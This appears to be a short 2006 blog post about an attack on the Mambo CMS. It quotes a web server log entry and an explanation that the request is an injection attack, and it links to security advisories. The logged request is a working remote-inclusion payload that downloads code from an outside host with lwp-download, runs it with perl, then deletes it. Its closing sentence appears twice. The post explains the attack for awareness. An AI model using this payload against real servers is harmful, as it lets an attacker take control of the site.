Mambo Exploit Payload

My thanks to Mr Peter Abraham for bringing this attack payload to my attention:

IP Address of attacker: 202.91.1XX.5
Sample log report including date and time stamp:

Request: newtimes.co.rw 202.91.1XX.5 – – [07/Feb/2006:00:00:24 -0600] “GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.domain.de/princo/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://domain.de/princo/sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*?

Because this is something that was new to me, i asked Mr Abraham what the attack or exploit was. Looking at the log extract, it would seem to the uninitiated that the web visitor was merely browsing their hosted site.

“It is an injection attack where the attacker is trying to attack a Mambo application by injecting commands to fetch hack kits hosted elsewhere, and in the process gain control of the server / site being attacked.

If it helps, please see http://secunia.com/advisories/17622/ and http://www.dynamicnet.net/customer/h-sphere/security/articles/01_2006_go_tattle.htm http://secunia.com/advisories/17622/ deals with the security vulnerability for which this particular attack focused “I would have asked TechandSec to look into this, as I know his interest lies in security, but he is currently doing his thesis….

I would have asked to look into this, as I know his interest lies in security, but he is currently doing his thesis….